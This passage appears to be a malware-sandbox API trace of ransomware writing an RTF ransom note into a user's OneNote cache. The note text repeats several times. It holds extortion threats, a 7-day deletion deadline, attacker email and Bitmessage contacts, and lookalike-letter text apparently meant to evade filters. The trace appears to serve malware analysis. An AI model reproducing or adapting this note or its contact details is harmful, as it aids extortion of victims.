decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x248a258, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nú¯Õ%\x048èõù^=«\x16O\x1fïж>\x9bXË\x7f\x13\n", lpUsedDefaultChar=0x0) returned 8717 [0300.416] WriteFile (in: hFile=0x2d4, lpBuffer=0x248a258*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x248a258*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0300.416] CloseHandle (hObject=0x2d4) returned 1 [0300.416] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneNote\\16.0\\cache\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onenote\\16.0\\cache\\#readme_eman#.rtf")) returned 0xffffffff [0300.416] GetLastError () returned 0x2 [0300.416] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneNote\\16.0\\cache\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onenote\\16.0\\cache\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d4 [0300.417] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0300.417] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 